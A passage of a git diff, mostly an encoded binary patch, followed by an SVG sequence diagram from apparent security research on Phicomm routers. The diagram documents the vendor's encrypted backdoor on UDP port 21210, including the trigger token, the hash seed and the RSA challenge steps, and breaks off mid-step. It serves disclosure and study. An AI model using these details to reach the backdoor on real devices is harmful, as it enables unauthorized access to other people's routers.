zXOo8c@F-{3hc|3Q_GrS=<s!T4IerRqVdwoo23pDZtto4%Dl;FV2_IO9Q2W~Q^IH|a
zucy)we?VxP;83HlLFt7lTSIZ`#`bcIQpD7iFwuYp!t@B}elaQ(9Yw%>blJ+q{>IW+
z^$TvK5~80UJ2CQ1eFwjQu~!^ue)U%yxo-XW-hapQ=T$JBNW`@P(5nDn*bw}!)Cbza
z0#5nv$>&l*b!xhDCZZfw<7r;3<!0(h)Fp~(Pub1q0b=Xx)kj;~*lmsLJqFKRxtIMa
zs`zpj!b5*HTI1@8yj5>=2ewJXrVcA}Y0L7J;Ab7!we(UYa-)CQg#W6(#J3Dnk6zAs
z8Cb1d!RU{_c4ulvC^<kZo2Bvkh-dFB(xXz6FN#r!`7uyXcCe^W;))E<95r&wo1dE|
z?>^phPQPDf%jjdlgj0HcE!;a_{B?GZ@zwV2n_H*9D{KpKmfiNvtR>HhU5&m$sbbgt
zMb^RzeGfH}ybNyzKXxdet6gnj&Ii+E>yPJzHI#Sn_WOp%qa4ncqnRW>@yU~F7TvwU
z+-q2L@s3DjV`pdQXE=O7Bdcm-lWL=c<LK}2PtYnDx7p*#A*^VEU%_s++mqat1fa60
zhpoEf82I;ZzLE~_bDY>m_!Fowo7H?(FKOIx$cae<sPFO0SZ{#F+jj2!f+gXm?6d$Y
zU;WYy!SDs&N<OJAZIa2<YWODgpnEY*pvZ^k!P^s-mMYBN_yF(pJdne0vSq`wn=%%R
zV2TJTZ2hp8g@pyng-e7P46G5G5mvokZ_|JGm9eLBbrNJK)dr-F47)vC*NF@I^V1L4
zTwJ(H)_v;iW?KWNHOag@8K@ElZ7X0>!UB?_rR-q}=_f^u51G!+jrBf#v9vKMv*@kt
zWX6+|Cdq|Pi4R--@4hRZH}caAXN&%(w^nR0@9|E4&!&k}TMg1Uv6_N!!FyNDt&ttr
zDhFg`Wf`wNQWOP>Ef1>_@O8Au!eW=NT#0@~taz1~p+TF~xsZz*gd1oKVKTT<4Gj(T
z<A36-xUWb{|NipP_U$&Xb{h>?n2Xbqv15g>#{EsiMCBsZ0@&bKk8Wd2X;ozFL&{&8
znE967ygBFkd9E1A3%hExO0PO+@y+gAhs??K2?4j>XQD%gFD`PaOh@HEc6s=TeYAy}
zn<{ghlF4+r@$PYkf7hAfv#VCE0#;TNw*sCBd-m@S6sK;43l{)F0LLW!74Lw%rFCX<
z1a&wVRE6eRzf9a~HM?KJmiaZ7c-7z`HXMpZ(+5wqbubAf2nk{60Gz=4+xMXM>4}4*
z15I39l2m0NV4|X|2Vdzsu4+E&s?#UoJKglW?LFq5lJp1Jy^=H?AFqvc+*udmw0n}A
zq|^@7^Y8H7e<AM0S=G$^!va@)swxyeP1Np<6W?*^gVYgRIe9yVqpBTQw2dY{QcDar
zU<ZM%Kd7nir>|(R>2|-nc^N?VXDl=T(O(t5s;Qyz+9FgTfK-vhL@=Es{b38VGF@9o
z=T&Jb6Y!$<r=G(dgFu8U7w^e^6$QI6LeDVF)P7qugs?@DA@!?WSvd~;0}po1?i`X^
zdGqE?8`UO=1kkq~h<NiICK<SLoC3stQE(xEH;3;5DzXTuvi@k5Re3tJ(J{aefm6yj
z7~9G_*ku#L5;U>U-GzAkL`~bWiidN7wnXtar3L{!O2-b!aG6L%=VqlR#qwsq9q+5%
zC-n*Q?8C9<qxJ9G%kdCDLC6?Pb2wq2LwqN3x$%DrZyBw}VEilbN?(R5V}uQZutqEe
z>VM+i3K=AUwk_KiA9C7y0OpV=$7%;;m=-PsiMUsym^GG@nC&9ujP-xDckXdDrf=I{
zAsQ9gWIJIsV~hzSjheA5tD-PAl}RR>l3hY5nMJaR?6(uC$tH!uLZhT4YJ_ZyP))lr
zOocK?6nejB9?#^R=l%Ttc|Y%8@BC$|wbs4v`?{|4Jdg7@k3*FHh_d3^r^iTc*RFmK
zf08K6V!3(5#q3^Q9usl<h)U9OcAAdl5OM@0-nVN;^qu`(to9R!JgFud9B4H8PTOBc
zM;{HnYfV*MvF+>(vx6HSj|`r0aN+qm8^XUSK2+A#&}Q4s#epN62S0hV@b&BwIlZ+h
z)>crg*qrIKe52)MXRSUSd;+?y-?Z~ihOc9wDhdDb+zaoh$jC-K7&*l9dpfX)yX{%h
z5;S5)R^%rWe|liZrMsH<C_(Cf=%Pj6vSUMWbtCt2ySaBT`*T^0auU)kLewQ5K=AS;
zlI7U)j;6cSW!)hQd`5qip57wbtW%4JaW_$vZ@`QwK~G{fe76Jk#Z47QkpE`F3ndv&
zSZjce$RdsACF*J;k?^y-Qnea%pl{!?b9aY?c8Jiw<I%(QwEF&6Lymo_f6U|SFE4g)
z@oSgHLDwHOe;bzKJE+0I#;Hq>3{0K2+Kp2y_HM`6Yi$h;c|w;S>NZe7wm?|;#11pR
zq1Hhr{{pT$qN%mr{-Wyk&Hpmi=wpIy>NR?0%joS5DoN|&=}jXporv1`g`0s(kM)nV
zd)K)<&(U+f6l&PIb;viH^)l0J4rhzrADXMFD+jeUUSA*hXbJ}A(y{&vL1HfDj&uDQ
zv%MBAw)##<aBnY}w@|C5<^KgwV9bJ?lF;p^?<|><Vg4>g?|X%3ce;?ucNG=xbefx2
zdw&jck~QyIi0S@vi_u3r{Z^r~H7d3q*mI%JfHmtQ=>E!TWMc+rly%g!%S}%PgZU=V
z;9DQNfWA9wy5pM=uNQABBptr;UgxEjX~C4SI!Xg0BY)=#3+Dv1Q@cLtW@2*qdUchF
z>*>4C$L?f7*rTMeBCjQPA~Ed`wbpxoR9r=_Ozz&+wo>1@yosZL3+sVc8s~kT7QA@+
zlj01>@(Ny|Zdd=CJ6IBDA-Dvh$W9gi_odG^U+Q&eGg&&){%JWm?WyG#{js*2NWbQo
z3&WIRgGHzX?QvYv!lMPYXf2<@gwqGzNEPZv<im1!{cyOi+6xhBQ7V1$2Gvy3!P<)2
zx0caf@1tYKWi@6!u#uQzpqfl?g?QN!8915q4M1fjwu<Jjp0tEeQDT5cMz^W7shxDQ
zY!8?3%bcN55FyCdK)nn@E#@|3!WUi&2YVCrd$!M>bShkw0jI|K`*Ee}nxn6iwa%4f
z?yoE>jR*1F0uc^vFZAtOF`XCk&CHglU-ryPC$ASNFG_8ZX@WRM;I`D;U07CZeQhYc
zXhjiZst{0b`ACpL_T2ro-FBaY`xE)3T~p_noyjOROUX~OhVpGSjUaJej-8T|yx2kv
zri20pg2F|Gm`&gG;<YgFR$h#Dh>n~s)KfMvc(B|JNypSdCaBwS*-Ze28Hwh5i=-Q%
zL72~3BuxIsc?D^nhS2CmR1D=mhMm2hF2T@GC=oOXS0U?49yZ;(22DXl`N=4T%w{eY
zfwZ#HT#tnd<DKFe#1I1!9<-R71b))0OmFsx*G4%MsdP{|sL^a*C#DwpiDT#f=o@!g
za1;hJkc?jjjv~MYzNA79K!)80AyrV2OkyjQ=9u^=q~@PONDN}0osOXR9=ay0$Eqh(
z`Mu4VzDLP&AsVqEh0IpwrE3%S!Lk;FE~Fd+(NGTlehVM30ZynR=AN2+k)WWZz%^<W
zcp~Vr)X_Bg6tZwy;Cd-+CadfVvBRS3tXh~1xi5177~9hi?UD55FgrVPQYlnK;YJ3j
zX)FxKyivV`S{>vn_{9<kLkxUv?NzPVOBsZiW<&3Qv|!OlB9;+~g*QOcA#(j)h%%yu
zjV{au+Rs~=p+ooOKCENKhQia^wr&*~peU*nML~lSAo<uA51UYEbhEdghH4#+i{_N+
zX^7UK8T@(8bsDh(BGaM8xkY%KeDR<Chi0>x^fNOvk=A4@2`YtqAQ49DF+@!FgK8P5
ztk{4EjL*(Jx!j-u#lWi@0q+{_Ew6(LC~vZiI;(U9?d-Qnss%WQ)Rla_5|r=32fGAX
z5w^4x=$|zccsn@-Z9G0^hf0Y1<J8wU4wxw*W*l}-ct(_x^FgH}L;0fyR<?#l0K#XA
zo>spbZ54QhiTJO)b@j_9q9(4RM7eq`4Vy>d9U(H3c^G4E3K3O~pOlo87iyXTyoo7?
ziNdd~M*aW{4&t?gSe$O$-NZ3qsEFoC_<}HOMPCh-BBnmPkvLP=txI|j#<b*!Dy@W#
zBLB-E1aBe3EC1yi=90t--<*fHW!ttD1Q%l@8u?nWDSN<AXjKR#)3s|?Nw#Qi!@TTS
zrs<-7^}+KDYu^#4W@H*CB#b(vs!}LAFR`~7?36%#ey`*a^eM=C!5K2bPQ5X_?LBgA
zbHE7!iK4G_<R}BT^jas91j<HB-&Q*3yhOiMG@tihJcU%hj&ih<Q(#8MFml%W;eG|n
z8HfRT9fNIyGSKI|za=(;tBzc!`LhB+nT`rTqQ=S3ohHmKUT4q%$C=pqj;X<kXZ!DU
zOAThc&?SdIh<v(_j1njl*{9fkuz>;%BJNBvGrt;DZCk^;=<f9dnc8He475TNSL?Qs
z1_dm;LQz%g61XfZEbQbStZVG^ZsiY*gHKiZR)#*7<pyaJIR@)!q2`=#XhvjLQ;enP
zD+3>o+|EHz#8K_L`)h^pVNQ<kNirxRY@A%f^H5zoU2uBd{Q28*Bf6)pDF33)pu@?J
zJ>^g|_IbI|$Z_e=4W*oce6IGn7v{U*$-*pfa&ofs#k--dNJ+YO_3F=YVRF9C4X6q8
z%1bn#Pf@Gzd#CX|-)6M$&Rqr#nlL3-`Kv+p2WR=ZIvKBrHV9?(sjfy2Q>5yWpFvqZ
zgU7RC8KqJL^@iH_wr8Br7zUL3ltvtWhy-oB`~b2khz_C}Cua>}{RzI0+93V=6k%L9
z&=9u8_G+stGuP;MmiHC%#-P!PLy2hzKSl*IdKu5sbtcwTZaV+7ca)~0*^ChHsgSs0
zV-XD3CohY=G4=7*u&`M^d(u-^&^y1A_&rS_g>R4vxm}j|!4bQRgK_;ZVv)v`Tk9yb
zr>CciIfK35*#Wh0o;&=+R;NHffsP<%r`|lrE(ad!7fIh*EIiAjaBy&7BhGxfpyXZS
z!+XNeO)D{y<ctpS&N2<Q9betJe%*XgCt`rsGGe)4(bO(tR1Dw)Vym)p%<};4mZUT1
zYysv@qA>SEJT3O<e1(;uU}x`&C5O&(8Ti3LYkJJB@LEvZ+@im__0g_h=0V=EMW%S;
z*+GmH!m}8AYyhfei5CKxH-yo5>u@UrgDw+VOZ5ph5xlx(wkVDD#$@5@9?MBh71dQ0
zo3(Y@Oy<wCCbT~HR^Qq4y0aJ-<k-Y;+yX|NhjmAT7r)@?rR71nSbM%P$tHa(T_v9F
zvAQ{Im!fwgX7rzut|u%+1!K?$+x82|7&orBTWX_HmB@~!bI5sYmgi%Yk7-uL0kyZc
zz`kdfxTp)zDM|Jh2hzk@={!;OmIXXb*$q`!L;LE&LQ!!`qN*M}Y#H-p39M7p(l&j%
z7HGT}Lcz`qC^Gx~=1BgZJmpYN*UbC}Qkh13q0j?3MD@L`Of&98#C7irKNq%85GrMx
ziUKRsTSA-xPH~v*;Td-O+G&S;pjWg_zcRVy55?6JVo7i4sK8VSU=95gt7|pBe+5uH
z#C2*rW_G=l`#@5j+h8()ERRq*u%LPMNJ>7700%K5%Qh2~%%g4R%B^+d16Gt0!*hk%
zBJ3K{zKqnBP1<X20|9gsCW6A7d5z@z4K@UsAUD$qpp(Ya`ZLvfx=la%#B}D=NOl=f
zYT~go8t*8&`nbQvU5|1bLDJbJaLYA@d*wU#`pxpqQ|p{rJfp1IH-*C!8dx<oWi~J}
zsijYzxRXbjr$7)XP3{}Cy7b|cnFVJ~pUk*L{`SaFBe@8~hHb$-W=<$Hb7o%JcH(&@
zgWf6~EqX&UjSG-+ywgF`&hu2Fe^Vu5;>L@Q62ggxq}TLBtx)!T_pU1CZU>E6c%n8Z
z1WuB{X3DZoZJh2_K<9Dp@>_VZyJED9%UVvS?q8b5eP1v;!M*Hwm(?admi6O>^Z4=W
z@EU>5=*~g=Ez-CE*lW?*RwS71o9*iQi<jz0`s6u*@!X7%fs4&K^YLfUmv$AL4|S_t
z^}jHT(m!s5fB{&oi7B=w8Y&cT;H}YUFi;f{EgkZk7-}T70c=l)S2qUxPRhT=WIB)(
z6*1L&K;}gwoZ?aAdb+{6MG5m^Br&E3uBEStQLQ55%UR_`qN0!+K!5oHBY$$ElDv=3
z0mPM}Rm5{Ba!RkSN=!A}`&CIS@FCkx&_x-y6yfOt*PeY#Raz6y;rp|ZXe*u1F=NI!
zOcu_hz%P>IZ``PlUz2`OL0T|8A$z~w!X%KPVu(SJ#eEZBk3{`FGX5cg1f10~^LSFh
z@p;I%i(z2sFL!Qx+ukjZ5)P%3eF3%asIWnX%^zR6_c~_KfWM*-?oK5kBkwOW(ug~0
z)}#0K%ju-XT9;Pt#0;oQj~*lX`K6~CqTEdGa_-{Ap<i`0o3<hI`Q(fWJ5~ePD+xmb
zsw(Kx9PJ1|URu%8G562>)h6&-SMeQCh+Btn2<jl$iUQ;HoJ*G0g9UHjfG_;_RkIr+
zH6)x5Y;*>_Dr#8jYdzfbk*ZlZw^#{dNW2#H^=%oTEod2YYHr~WXnu_GG-egU>hXDW
z=X-ODl}hkF<W)(YV&}7Pl66CP+>e=vCe?v02J`?2_)D^*F)l9MvnQQ!*Iu!5C7IHT
z9q#6TieCf2rKA9AdWynHMlX-$i782P0jMVri^?jRepAE~SeQOzCi!=N$kSDfJ2l6M
z!7EZcA^b9zo83OtuuYqcmo9IAsYQ7xr0=X9Cr`$qlTU55iR1%JSCLTVt$irbq$^1&
zI0vf}dbKr7fUPLc6Cvy>3j%8WrKwB?t<uSvFo@+kgwCW`9st?8*trc$aA5OD(3XXQ
z0KLFGk@l@NeEMBW5|A&#k3k_b;&JkwfBvCG%-jSA_9L5zK^y0ogEjr3)%TmYs92j^
zTgEA1(?dcTe6%=&v%-|Z1!jt9y24N29`0yO&=W~CIt9&8)MPBsou;fP{ZAb2;2d@)
zkFPU+-Dz@hpgd%B%oAHL@YQoZq^!5w*Q~jEOr4Nwu>4T5OFfK1WwS%pK0$j(=fv;E
z9?`-HwB}0v>fJcDHPxO&(c}{Hy%&3%pExfCeoB3Ui_&=b7;XppPy3taH?_2}@jX!w
zb$D=|DT{>jUHyA5Ke2Y^wet?OLjwpsS@ZD6y<79v_xo+*cOp4#S8;5R+YIZ9iv|n)
zyB%1XzWNUFQb+mXi_S}L>V5zDaGL}5-}HhHkR44P$|uh)Ph6%XM9dnc(jnYE(Y&0k
z(S2Qp#L*5%&9#*}&J5@`CDErG2^;9jpztIr3YyAk!A*Yqr8t9r4+^1fJN#Sh`UvUO
zb1qBwzK~G8x)T~CD;VEq@Irg<((`E~i}RRBU0hc2?)jeDK!XM(3TAnJ4ihK#GD`Zc
z&gSw?P`wsND7w6MZFeRH4cWhSB8kwA%(MQBA?dM~n+WnmT{bI!+BNT~(0ZWJEr%=5
zYGqBIAaluCOtJeEN6yO`KOCDVeeTkqDEI;4WSSPADVb3LNus;G`LX}MK$D{6s)B~z
z-CQr@nE{83Y6`+x9h5P|a#ZEheGl(*C@aJi8A4_Q_O0lH!>+_)a4k8OeV(b0a#HeR
z-X)DT3CIC{hAW|6;zf9Q(*rsjHWWvc+Dxft?z3)kWI__iJ<G81W;3Ny%PPC@0)>0g
zg9q9iUn0AJFm~@*39*<f=qMx2M-OzpOgos3Cj%33HG51*JbCA>)7Ojf9u$4sSFc|S
z0~S}V?co98NTq=CX!Y*2=q)O1?aaN}VSd>N=M6L&<;1N%>np0PXs*LR1FRL)Md$?a
z(T{d^Y`P_8r{MZr+$u&9Sbua&T>koL08tOK?)GxD%bdl_mqRGRC3}n>S?MjK$HE!m
z#xd^FBsnE4^nawBc$jqT`uXQY99rp!-pD~flUPi(cp`Cger&4|5RXG<B_B<qC?XOr
z109zJcpm;0yfisQyV=l)Afx&jXnMKp|5y*U>pj`(Xx`!WnkCOJcay_Uf*q$j`tGWI
zql<t69O$kXBE>{@6alhJ=gAJw04iCZq30Oz-h_vROujIOX+_^Yes19=R$#+~R+?|-
z7JMpr0p+0S;+I~G>dBm6W6K+~WC01fPWa_Dn#uk8b)epd7JQNG6Z0ZvBS58_DFFfK
zpIPfHC!ugXJztxIbREO5q((PUW{CDetv74lh+TbbzpBkEe772HJG&d$s?1hcxw}W4
zoU3fap%1*saPh&03ON`{`@-ws$<kNe)z{UYVjOL-)}M}T-X4*3JQ(zt0E!0u@f}j-
zn0%Fkn({(Wfea`iU*;k9H=Q;zjhzikyU~g_L1;o5xQu2c()Ze|4`m~kZRA3B?Itwp
z>?@k<>#w3$`*=xc2MxHq02f3o1J&)^PQJo-kGshI9Huo5tsSSKZ8dT{Ls(wum0deW
zZ<oc~PM}LL?B>5=7UvZl5;nx&*O9IBWu!u)h74&j3oFibyxS4Kf?2>lRIwd*FRh*_
zDbl@Db2|&3gbJBm@y6~cmIrPZhnskOlntA;5kHjX0X2Dr9#e6BBc}p{8**xT#__%M
z?A#zFWG&#~D;vqkS1@5vrNdP>Qz(d1jksSzzWx1JFIN{z-6LmUWI0&5+09N{Az6;H
z5rAf77ik8N1{kQiAgv}<1=!2JY)_ehfqujLQQB%Ln7L{~PfkbKn}ss7kOYdOm_aFU
zq<)I~X(HDy_J%r2QPkkDKoxvMo2=VyH2mA%`bY7<I_mAX$2*G9!`RXyIs;L$Wl9m>
zZl-vJx}q*BZ^}ljo(<&()h@JA(9+aGhevNqYG@hOZ9R3A-k@ar3okP#6cx)*W5Yw9
z766Va9aKO%D~>OHtB#&Xj-mho8CP9i)=DFdWra7&$I)IO8*#gbLs#j(?3Q**n1x8V
zpOnW6k%AX0&K*XwE?8`%8=pFw?Ma!btm&v7le+^J<L+*se=Y=~*naGl?EV#f+4z!{
z-5CUDo+W2dxTN8^lZBlf%LtRR((3h*!cTZdk;c<zT7Bd(fGv-Y%-uXOIke7S85^bz
z9C4r=R{JvrGQ*)UW{PJ*#1Dt3`uembpLp9>Q3N_^OA)c5Q&=z8@8<ux=ExZc@o@J|
ztIy`92ABDL&0sm{D^D(i^el2V#KsmX9a8)T3NX1_<EzFDoZP34Mn(!8UavDWiG)?K
zGpw}+>)0zV4~AXbKd3lESY>-UZwb<)XZdr+&<*Xhl#QSy&x15a)MPTIG&#HCS>~#d
z3ON?S0)D&cmlZp8I8U3VR?Z2_m-nU^{BiyGX>l4;&mBB?dBME9-CQ&M%Yi^0zdC$$
zV1sj@6Fswi@mnG2nIaDAl6Pm7D5*K*?3}c;d-A9%KgU}nruy+s@~aMZoD&Sxf>P$?
zvXbjFE1yqvq|C=C=taiZuMBDaX@$J3nKI0X7R~>@UC?)$Od%WFCx6xYIfqs&`=$kx
zzlq&ADUI;8NZ_&BHVLcQD*#Jf_N9OQv_p9LALISppudi0ek!NrMEkIt@x;Tp#tq{r
zpx4hsk6kM3ihW_0`zaUIMSDBuM(8$RB(O`iI02o1Thi<4##JT^pjov06Y5jCSFu<&
zB0M70fBUJ~)~m}F_};c~jXqmZ_Lo)LX~HBx11ZE}?rx`JgNoOc_cv{=;fE7rES9`_
z3gVs^TlVCLX2DO?Up-u68=<fIxg2HW-#W^al^Hh!;}iS$_l!SXCVLYq(&Kwd6Nm_~
z6BK%*MjY;cFz)-2Uc(aHGb%QB_id-y@)4pv(ob2*TFl7k=su1)V`tVe5S&T!#P>yH
zj%^O%UyRW%$D0A;aybW@>Ap{DyX))j`gUH#<2Wq8scOkkgnKx#29X<Y5O76Rog29w
zhYZY$yo<z|soQfA*tE~<L5n#9+JgR^{ng=Zsuo-qgFT9g<cibkOHaXwTb;|-*Nrg|
zcB9lyUI*gc26K;M-3BK<Rax{nq%MjIvx!H<DKy}qGA&s6jqn~Y&RgNM5ckTQKVxYk
zZYuyQ)GaDc3#Qah%=5l*@AzJj|AsRX+y)DohA^<9lWu0(M`#?JK?G<p<<-aMEvr^t
zk)PC7o(>(9XV0D;2Rc)an(?EH%O?aVDY|IN0vS-8P)o$Fk7Y|q4~Ko)Kq2Z;PzEZS
zIdg=yK*@^=_VK+F4aF;mM-|n-Z@D@Cm+U!f9WBB(>r*BL6xcmAN9R%*^Kg(zdNRS0
znJ{k(Y13t&imtpM;LZKc4*8HL+~Fw$zer08Dt?q2b?{wIUw7%EAWS>F>O*UzG>$Gt
z1Rv;7G(QEX_IM=a?B$F{p*Mf<dtB8)BQt{1o_bO<@r#p34;|W~{|R1C%b5-YTI@K$
z6$%!>{n7Dp+cFqpm2S3NA%Vqa^5iaoheFT1oLIpXv0nvxC&xSFtIA8#clK$OyBkq{
z2vI}97i4%%d&q$|??N29(LYc*U3)P9^|PtMXH>+bo*-lt(O0oh|6;Ra%|Ge0gC*~0
z^}fqq;Bb}8#HFa=ZO_UHJukeG`B+LrN>0Ae1;8-jvgX*jNW*^AZas29TG0b4Z#znD
zm7Hd{*Ynjyvl{~%QVq~ci@*{{VzuJ;9}{9hxv>wu((9zJP&);2rC5{7kc1FsEq1pX
zF!NJXbrJ?(k4a}g-8}GRJ4qoPtmD@vVS7(OSdnV&`y(-7y(>B1+gZ%{6o_4jAP{mf
zDY?|6I0Jh$1*mDVq34F47k(#C#78CJ&fAa<8Wet0Ax_La^Y?16LSHxx$SRZDLMG)9
z8^6;X*K#_12YkA1fq`-U#=X(S8GK>MO4%}GENKjiGn8?jc0yFYs+O9P9q!FgMpNzU
zo!I(0V1V^%y}=AXebeMtt5E}%6ErTD?Rv(s87}6{bQ_PKII(q8m4N#O&yteXbZV^U
z+)e{RxyukT*A=i4Ee^e8-FXXKVm;QLAN^!v_#podV3}FZ;k?-S^{^c})S`qbSOya6
z8oyUJ6gS=aKyY?J5-pBxJ}th?iHi>^H$rEYWNqU{TT1zp17gX_0G@J+YCbcr->qJ?
zru-BXn!Qri;)kl*XN3f@2-VMY@iLBBJ+0mp!GCO~|N79oE8Kw!0Lm#(2Y>;Lb9#%G
zV22~MoKtuHdeqg}xO%wz2e#Ca?_|wqE^epWZ4hwZ`j`OHhLx3*q$ygt%3#RK4#vh2
zDIGq1(~Qux;FOkiWJJIEU2J!wx;vQfR_{vJ`A$wy+1U65)gQUIvs_yKnMQ5y>el_%
zBfp(yT$6vlAuqJKlm1b0ZfqQDUjJo0v8{3S3*~<gc<?43vp+81jg4o0G)v-J<ZzWg
z`{>&^bnV|isd$v8y{RxA5?6lMqt%ClOo(Z=bp7Z%lo#5YH++BP{|!C_WWzR#SyOxX
zij13FQvdUdIPa)whf?c)TK&&YgS{W%)F_1ZN|j;Vd;L>T$G)UFG5W&z)L_sC<^hC^
z!9CFVuv&xr2AL3{qRpH#2eSL<u0Kluy`mZbs_~=ey$m7t-T!ZZc~&!LAU2Pz2`1SU
zu5{H+U-f>t^sXhd3FoWN43|s&w%#K)G;&n!2=X7t9d40-{zG2()-csDJXh7`{bl}h
zQ%qKw^dm)AUokbSBZhSPaDmyAOkFdhJH?V6a^3ZQ{GDs2l<C+6RowXG3oi86dQ&0)
zS03ws+$B?FY5qT1VgLV9m<wY8e7x`ePj|)RYnoPny?xXBvoGx`GV^b>+8lFc%Ru+z
z=Yzub8x^$cvBk`~*7Wpdt7RFw-_@!Mi}s&LZ{>JE=g&V&EGGs`IF~)L%h21kCqj&R
z@quf5xwd!vv#@#&zTW%H-_1?lp4{`@>yyO+k0xzuHRH%j^Xj?&pLO;d5$^e_u==|N
zjeakGR#@%x?#EF!HZOKg+nTKSJHY7Yq@V8np0;@Q?232E2L_OQl#EPx)}_;%Q@i<h
zc~Fq1ZJmWLbwKm#-ty}~_F(#;=1io?_SyA#pRP02>Pp&(?>BHnjo`njG8D77`AS}L
z$)ov%y4A>nwDGX7J4ksYTkrkpB0sjNs-sHP{Wx>rB8bF<wPHwFA3n7^3g;=6{Nany
zKb52!_PQ{F_sUObZN^Imdeyz>R$I5ak7*9&pFi{%Q}@%lbdW!CX<hfz7sucKQJXqa
f;D37Q!`g<wjJl*QHuuv}@SnZyNE?l6@{0cj&%(HZ

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/img/Phicomms_Encrypted_Backdoor_on_UDP_Port_21210.svg b/Phicomm/backdoor-lockpick_tra-2022-01/img/Phicomms_Encrypted_Backdoor_on_UDP_Port_21210.svg
new file mode 100644
index 0000000..2c1b6d4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/img/Phicomms_Encrypted_Backdoor_on_UDP_Port_21210.svg
@@ -0,0 +1 @@
+<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="1111" height="1991"><desc>title%20Phicomm's%20Encrypted%20Backdoor%20on%20UDP%20Port%2021210%0A%0Aparticipant%20Client%0Aparticipant%20Server%0A%0Aactivate%20Client%20%23brown%0AClient-%3EServer%3ASend%20the%20token%20%22%3Ccolor%3A%23red%3EABCDEF1234%3C%2Fcolor%3E%22%5Cn%5Cn%5BHEX%3A%20%3Ccolor%3A%23darkgreen%3E41424344454631323334%3C%2Fcolor%3E%5D%0A%0Aactivate%20Server%20%23brown%0A%0AServer-%3EServer%3Acompute%20MD5%20hash%20of%20128-byte%20buffer%5Cnbeginning%20with%20%22%3Ccolor%3A%23red%3EK2_COSTDOWN__VER_3.0%3C%2Fcolor%3E%22%5Cnwith%20the%20rest%20of%20the%20bytes%20left%20null.%5Cn%5CnStore%20the%20result%20as%20%3Ccolor%3A%23blue%3EDEVICE_IDENTIFYING_HASH%3C%2Fcolor%3E%0A%0Aactivate%20Server%20%23orange%0A%0AClient%3C--Server%3AReply%20with%20the%20%3Ccolor%3A%23blue%3EDEVICE_IDENTIFYING_HASH%3C%2Fcolor%3E.%5Cn%5Cn%5BHEX%3A%20%3Ccolor%3A%23darkgreen%3E812B50867EFB281491D8F9285D007914%3C%2Fcolor%3E%5D%0A%0Adeactivate%20Server%0A%0AClient-%3EClient%3AProduce%20a%2032-byte-long%20message%20called%20%3Ccolor%3A%23blue%3EXOR_MASK%3C%2Fcolor%3E%5Cnthat%20the%20Server%20will%20decrypt%20with%20**RSA_public_decrypt()**%2C%5Cnusing%20the%20hardcoded%20public%20key.%5Cn%5CnIt%20seems%20that%20the%20Client%20is%20expected%20to%20encrypt%20%3Ccolor%3A%23blue%3EXOR_MASK%3C%2Fcolor%3E%5Cnwith%20the%20%3Ccolor%3A%23darkblue%3E**PRIVATE%20KEY**%3C%2Fcolor%3E%20that%20corresponds%20to%20the%20%3Ccolor%3A%23darkblue%3E**PUBLIC%5CnKEY**%3C%2Fcolor%3E%20hardcoded%20on%20the%20device.%5Cn%5CnStore%20the%20result%20as%20%3Ccolor%3A%23blue%3EENCRYPTED_XOR_MASK%3C%2Fcolor%3E.%0A%0A%0A%0Aactivate%20Client%20%23salmon%0A%0AClient--%3EServer%3ASend%20%3Ccolor%3A%23blue%3EENCRYPTED_XOR_MASK%3C%2Fcolor%3E%20to%20Server%0A%0AServer-%3EServer%3ADecrypt%20%3Ccolor%3A%23blue%3EENCRYPTED_XOR_MASK%3C%2Fcolor%3E%20with%20**RSA_public_decrypt()**%5Cnand%20store%20result%20as%20%3Ccolor%3A%23blue%3EDECRYPTED_XOR_MASK%3C%2Fcolor%3E%0A%0Aactivate%20Server%20%23salmon%0A%0AServer-%3EServer%3AGenerate%20a%20string%20of%2031%20random%2C%20printable%5Cncharacters%20(between%20ASCII%20codes%20%3Ccolor%3A%23darkgreen%3E0x21%3C%2Fcolor%3E%20and%20%3Ccolor%3A%23darkgreen%3E0x7e%3C%2Fcolor%3E)%5Cnand%20store%20the%20result%20as%20%3Ccolor%3A%23blue%3ESECRET_PLAINTEXT%3C%2Fcolor%3E%0A%0Aactivate%20Server%20%23orange%0A%0AServer-%3EServer%3AEncrypt%20%3Ccolor%3A%23blue%3ESECRET_PLAINTEXT%3C%2Fcolor%3E%20with%20**RSA_public_encrypt()**%5Cnusing%20the%20hardcoded%2C%201024-bit%20public%20RSA%20key%2C%20with%20the%5Cn**RSA_NO_PADDING**%20option%20set%20(%22Textbook%20RSA%22).%5Cn%5CnStore%20the%20128-byte%20result%20as%20%3Ccolor%3A%23blue%3ECHALLENGE_CIPHERTEXT%3C%2Fcolor%3E%0A%0Aactivate%20Server%20%23pink%0A%0A%0AClient%3C--Server%3ASend%20128-byte%20%3Ccolor%3A%23blue%3ECHALLENGE_CIPHERTEXT%3C%2Fcolor%3E%20to%20Client%0A%0A%0Aactivate%20Client%20%23orange%0A%0A%0AServer-%3EServer%3A**XOR**%20%3Ccolor%3A%23blue%3ESECRET_PLAINTEXT%3C%2Fcolor%3E%20with%20the%20first%2031%20bytes%5Cnof%20%3Ccolor%3A%23blue%3EDECRYPTED_XOR_MASK%3C%2Fcolor%3E%2C%20and%20store%20the%20result%20in%5Cn%3Ccolor%3A%23blue%3EMASKED_SECRET%3C%2Fcolor%3E.%0A%0A%0A%0AClient--%3EClient%3A**If**%20the%20Client%20possesses%20the%20%3Ccolor%3A%23darkblue%3E**PRIVATE%20KEY**%3C%2Fcolor%3E%2C%20or%2C%5Cnperhaps%2C%20a%20database%20of%20such%20keys%2C%20each%5Cnindexed%20by%20an%20%3Ccolor%3A%23blue%3EDEVICE_IDENTIFYING_HASH%3C%2Fcolor%3E%2C%5Cnthen%20they%20may%20now%20proceed%20to%20decrypt%20the%5Cn%3Ccolor%3A%23blue%3ECHALLENGE_CIPHERTEXT%3C%2Fcolor%3E%20and%20store%20%20the%20result%5Cnas%20%3Ccolor%3A%23blue%3ESECRET_PLAINTEXT%3C%2Fcolor%3E.%0A%0A%0Aactivate%20Client%20%23pink%0A%0A%0A%0A%0A%0A%0A%0AServer-%3EServer%3ACreate%20two%20new%20strings%20by%20calling%5Cn**sprintf(**%3Ccolor%3A%23blue%3ERAW_TEMP_KEY%3C%2Fcolor%3E%2C%20%22%3Ccolor%3A%23purple%3E**%25s**%3C%2Fcolor%3E%3Ccolor%3A%23red%3E%2BTEMP%3C%2Fcolor%3E%22%2C%20%3Ccolor%3A%23blue%3EMASKED_SECRET%3C%2Fcolor%3E**)**%2C%20and%5Cn**sprintf(**%3Ccol